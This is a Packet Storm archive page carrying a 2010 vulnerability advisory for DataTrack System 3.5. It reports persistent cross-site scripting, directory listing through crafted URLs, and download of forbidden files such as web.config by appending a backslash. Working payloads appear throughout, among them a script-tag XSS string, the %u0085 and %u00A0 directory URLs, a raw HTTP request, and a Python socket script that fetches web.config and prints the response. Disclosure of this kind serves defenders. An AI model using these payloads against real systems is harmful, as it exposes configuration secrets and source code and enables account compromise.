exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

DataTrack System 3.5 Cross Site Scripting

DataTrack System 3.5 Cross Site Scripting
Posted May 19, 2010
Authored by AutoSec Tools

DataTrack System version 3.5 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | b26e431c41faa90e692db047d4babce4e4f22b4a3f9015b26d0c293b9a73e8f9

DataTrack System 3.5 Cross Site Scripting

Change Mirror Download
#============================================================================================================#
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #
# #
#============================================================================================================#
# #
# Vulnerability............Persistent Cross-Site Scripting #
# Directory Disclosure #
# Configuration Disclosure #
# Source Disclosure #
# Software.................DataTrack System 3.5 #
# Download.................http://www.magnoware.com/Downloads.aspx #
# Date.....................5/17/10 #
# #
#============================================================================================================#
# #
# Site.....................http://cross-site-scripting.blogspot.com/ #
# Email....................john.leitch5@gmail.com #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# User submitted data is not HTML entity encoded before it is rendered. #
# #
# #
# ##Exploit## #
# #
# Login using the web client and submit a request with summary set to <script>alert(0)</script>. Navigate #
# to My History to see the result. #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# The contents of the root directory can be listed by using a specially crafted URL. #
# #
# #
# ##Exploit## #
# #
# %u0085 #
# %u00A0 #
# #
# #
# ##Proof of Concept## #
# #
# http://localhost/%u0085/ #
# http://localhost/%u00A0/ #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# Forbidden file types (e.g. ascx, config) can be downloaded by appending a backslash to the filename. #
# #
# #
# ##Exploit## #
# #
# GET /web.config\ HTTP/1.1 #
# Host: localhost #
# #
# #
# ##Proof of Concept## #
# #
import socket
host ='localhost'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('GET /web.config\ HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')

while 1:
response = s.recv(8192)
if not response: break
print response
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close